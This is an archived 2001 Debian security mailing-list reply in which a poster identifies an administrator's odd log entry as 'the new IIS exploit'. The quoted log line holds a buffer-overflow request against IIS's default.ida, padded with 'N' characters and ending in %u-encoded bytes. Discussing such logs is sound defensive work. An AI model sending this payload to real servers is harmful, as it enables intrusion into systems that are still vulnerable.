Re: CGI Buffer Overflow?

To: Brian Rectanus <brectanu@vt.edu>, debian-security@lists.debian.org
Subject: Re: CGI Buffer Overflow?
From: zietlow@berbee.com
Date: Thu, 19 Jul 2001 23:08:53 GMT
Message-id: <[🔎] 200107192308.f6JN8qu22247@berbee.com>

Welcome to the wonderful world of the new IIS exploit

> Anyone seen this before?  I have looked around for similar attacks, but
> cannot find any info.  I assume that is a unicode string padded out with
> Ns.  How would I go about finding out what is in the string?
> 
> 
> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a  HTTP/1.0" 400 328
> 
> 
> --Brian
> 
> 
> --  
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>

Reply to:

Prev by Date: Re: CGI Buffer Overflow?
Next by Date: RE: CGI Buffer Overflow?
Previous by thread: Re: CGI Buffer Overflow?
Next by thread: RE: CGI Buffer Overflow?
Index(es):
- Date
- Thread